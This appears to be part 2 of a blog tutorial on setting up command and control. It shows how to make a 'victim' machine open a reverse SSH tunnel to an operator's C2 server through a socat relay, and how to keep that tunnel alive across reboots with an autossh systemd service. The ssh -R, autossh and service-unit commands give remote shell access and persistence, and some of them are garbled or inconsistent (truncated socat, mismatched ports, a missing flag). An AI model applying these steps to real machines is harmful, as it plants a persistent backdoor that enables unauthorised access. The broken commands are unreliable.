It is time for part 2 in this series to set up a Command and Control, and this time I am using ssh for creating reversed ssh tunnel to my C2-1 server. So I can run ssh from a client machine and take over this machine from my C2-1 server. A picture says more than 1000 words so lets start with that!
- run socat
- Install ssh server on C2-1 server
- Configure C2-1 server for key login and no passwords
- Generate keys to use with autossh
- Install autossh
- Run autossh
- Autostart autossh
- Access remote machine
The socat we did in part 1 so go there if you want a little more info.
Load the socat server and map port 21 to the C2-1 server ssh server on port 22
sudo socat TCP4-LISTEN
Second of we start with installation of ssh server on C2-1 server. If not that already is installed
apt-get install openssh-server
How to enable key login for ssh server
vi /etc/ssh/sshd.config and set PubkeyAuthentication to yes save the file and run
We have now created a ssh server on the C2-1 server with only key logins. We have also used socat server to forward any ssh connection from the public ip to our C2-1 server!
Because this is only a poc and for my own joy, I do not thick to much on security so I use the same public key for many things. Let me explain. We use keys to access the ssh server. What keys we can use is configure on the ssh server in a file ~/.ssh/authorized_keys
In that file is the public key from the client that will access the ssh server. So I create my one key a public key. That I will do with this command. (I did this on my workstation)
Then I take the information in the file in home directory ~/.ssh/id_rsa.pub and put that information in autorizedkeys on the C2-1 server.
Copy what that command shows and put it in below file on the C2-1 server
Paste it in this file
Lets try it out!
We have now gone almost all the way.
We can connect from a client to C2-1 server thru socat server on port 21 with keys, no password.
What we want to do now is to do this in a more automatic way and even if the client machine reboots we want it to reconnect.
Wait, at the beginning we talked about reversed stuff not just ssh to a server.
Our client connects to the C2-1 server with ssh. But we whant to use that ssh tunnel for reconnect back to the client as the name says reversed ssh. Look at the picture at the beginning. I hope you will get my point.
Lets do this manually first with ssh.
Victim -> ssh –> C2-1 server then I that own C2-1 server ssh on local port on C2-1 server and get access to Victim.
We do this with this ssh command from Victim to C1-1 server.
h -4 -R 8889:localhost:22 c2-1@my-jump-server -p 21 -v
ssh for the command
-4 is for ipv 4
-R is for reversed tunnel
8880 on the C2-1 server is that port that we ca access the victim from
22 is the victim ssh ports
c2-1……is the my C2 server that I connect to ssh on port 21
So the victim has now connected to my C2 server.
No it is time that I connect to the victim. And I will do this now.
I have console on my C2-1 machine and ssh to a local port that was defined above.
ssh firstname.lastname@example.org -p 8889
I have now ssh access to the victim thru the C2 server.
But what will happen if the victim reboots och kill ssh. That where autossh comes in.
This is an application that reconnect the ssh connection from the victim and C2 server.
I refer to Victim and C2 so it will get easier to understand what I am talking about.
Lets configure autossh.
Before we configured keys to use with ssh. Why? we can use password. But when we want to use autossh we must use keys and no passwords. That is why.
Lets install autossh
apt-get install autossh
Then we can try the command manually
autossh -N -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -i /home/roger/.ssh/i
d_rsa.key -o "PubkeyAuthentication=yes" -o "PasswordAuthentication=no" -R 6666:localhost:22 email@example.com 443
Then we move to our C2 server and connect to the victim thru port 6666
ssh roger@localhost -p 6666
But if we reboot the victim machine so now we want to create service for autossh.
Past below into this file. Change values to meet your requirements.
[Unit] Description=AutoSSH service After=network.target [Service] Environment="AUTOSSH_GATETIME=0" User=roger Group=roger ExecStart=/usr/bin/autossh -N -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -i /home/user/.ssh/id_rsa.key -o "PubkeyAuthentication=yes" -o "PasswordAuthentication=no" -R 6666:localhost:22 firstname.lastname@example.org -p 443 RemainAfterExit=yes [Install] WantedBy=multi-user.target
The we change the file to be executble
chmod +x /etc/system
Then we enable this as a service
systemctl enable autossh.service
systemctl start autossh.service
When do we use this? This is great to use if you have a machine where incomming communication is blocked! Then we reverse the ssh so victim open ssh tunnel out and create a reverse tunnel och the C2 server for us to access.